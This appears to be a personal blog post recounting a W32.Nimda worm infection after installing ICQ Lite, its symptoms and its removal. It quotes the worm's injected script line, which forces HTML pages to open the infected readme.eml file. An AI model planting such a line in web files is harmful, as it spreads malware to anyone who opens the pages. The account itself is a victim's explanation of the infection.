    Burn In Hell Icq!

For me to say something like this, something big has had to happen. I have always been a pro ICQ anti-MSN kinda guy, till a couple days ago that is. I reinstalled 2K, installed MSN and Blackice. Left it alone for a day, then went to install ICQ lite. I downloaded it through downloads.com from ftp.icq.com. After installing it I noticed my connection speed had dropped severely. I hit NETSTAT and saw endless lines of "xxx.xxx.xxx.xxx:http" (the x's being numbers). Didn't take long to discover that I had been infected by some sort of worm. It was pretty easy to track down, it left a file called readme.eml all over my pc and added links to it in random html documents by adding:

    <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

to the end of the file. Meaning anytime I opened a *.htm or *.html file the virus would spread even more. I figured out it was the W32.Nimda Virus and downloaded symantecs removal tool. It's all gone now, with no damage done to my system, however my thoughts of ICQ will never be the same.

I remember when I first signed up for ICQ, and someone within 5 seconds of signing up im-ed me asking me if I wanted to see their site... and well I leave it to you to decide what kind of site that was.

Anyhow, I blasted them, and well since then I stopped using ICQ.
